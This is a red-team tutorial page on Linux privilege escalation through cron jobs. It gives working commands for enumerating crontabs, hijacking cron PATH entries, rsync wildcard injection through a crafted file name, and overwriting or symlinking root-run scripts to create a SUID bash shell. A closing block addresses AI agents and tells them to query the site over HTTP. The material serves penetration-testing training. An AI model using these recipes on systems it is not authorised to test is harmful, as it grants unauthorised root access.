# Cron Jobs

## Theory

Cron is a job scheduler in Unix-based operating systems. Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server.\
By default, Cron runs as root when executing */etc/crontab*, so any commands or scripts that are called by the crontab will also run as root. It can be an intresting privelege escalation path.

## Practice

### Misc Cron Jobs

{% tabs %}
{% tab title="Enumerate" %}
You may want to enumerate cron jobs with the following commands

```bash
#Print jobs with Crontab binary
crontab -l
crontab -l -u username

#Directly cat files
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

#From logs
cat /var/log/syslog | grep "CRON"

#In /etc/ and subfolders
cat /etc/crontab
cat /etc/cron*/*

# In /var/spool
cat /var/spool/cron/*
cat /var/spool/cron/crontabs/*
```

{% endtab %}

{% tab title="Monitor" %}
By using [**pspy**](https://github.com/DominicBreuker/pspy), you can fetch processes without root privileges. It can be useful to detect cron jobs.

```bash
# -p: print commands to stdout
# -f: print file system events to stdout
# -i: interval in milliseconds
./pspy64 -pf -i 1000
```

It is also possible to monitor processes using the `watch` command. For example, we can grep on all occurrences of the word "pass". We may find clear-text credentials like that.

```bash
watch -n 1 "ps -ef | grep pass"
```

{% endtab %}
{% endtabs %}

### Cron Path

{% tabs %}
{% tab title="Enumerate" %}
For example, inside */etc/crontab* you can find the PATH: `PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin`

We need to check if we have **permissions** to write on each path, if a the binary in the cron job is specified without the full command path, we may be able to exploit it.

```bash
$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    path-exploit.sh
```

{% endtab %}

{% tab title="Exploit" %}
We need to check if we have permission to write each path.

```bash
ls -al /usr/local/
ls -al /usr/
ls -al /
```

Assume we can write an arbitrary binary file under **`/home/user`**, and its specified in the crontab PATH as in the example. We can create a payload in there.

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/path-exploit.sh
chmod +x /home/user/path-exploit.sh
```

Then wait for the job to execute.

```bash
# Run SUID Shell after exploit
/tmp/bash -p
```

{% endtab %}
{% endtabs %}

### Wildcard Injection

{% tabs %}
{% tab title="Enumerate" %}
If a cron job script running as root contains an `*` inside a command, then you may be able to exploit it.

```bash
$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    rsync -a *.sh rsync://host.back/src/rbd
```

{% endtab %}

{% tab title="Exploit" %}
The exploit will depend of the binary. Using the previous example, we can use following commands to exploit it.

```bash
touch "-e sh myscript.sh"

echo '<PAYLOAD>' > myscript.sh
```

Read the following page for more wildcard exploitation tricks: [HERE](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks)
{% endtab %}
{% endtabs %}

### File Overwriting and Symlink

{% tabs %}
{% tab title="Enumerate" %}
If you **can modify a cron job script** executed by root, or it use a **directory where you have full access**, the we can exploit it.

```bash
$ cat /etc/crontab

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    /opt/crons/overwrite.sh
```

{% endtab %}

{% tab title="Exploit" %}
If we have write permissions on the script, we can exploit by overwriting it:

```bash
#Check you have permissions
ls -la /opt/crons/overwrite.sh

#Overwrite
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /opt/crons/overwrite.sh

#Wait until it is executed
/tmp/bash -p
```

If we have **full access over the directory**, maybe it could be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you

```bash
#Check you have permissions
ls -la /

#Remove folder and create the symlink target
rm -rf /opt
mkdir /tmp/crons

#Create a new script
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /tmp/crons/overwrite.sh

#Create symlinl folder
ln -d -s /tmp/crons/ /opt/crons/
```

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://book.hacktricks.xyz/linux-hardening/privilege-escalation>" %}

{% embed url="<https://tryhackme.com/room/linuxprivescarena>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/redteam/privilege-escalation/linux/scheduled-tasks/cron-jobs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.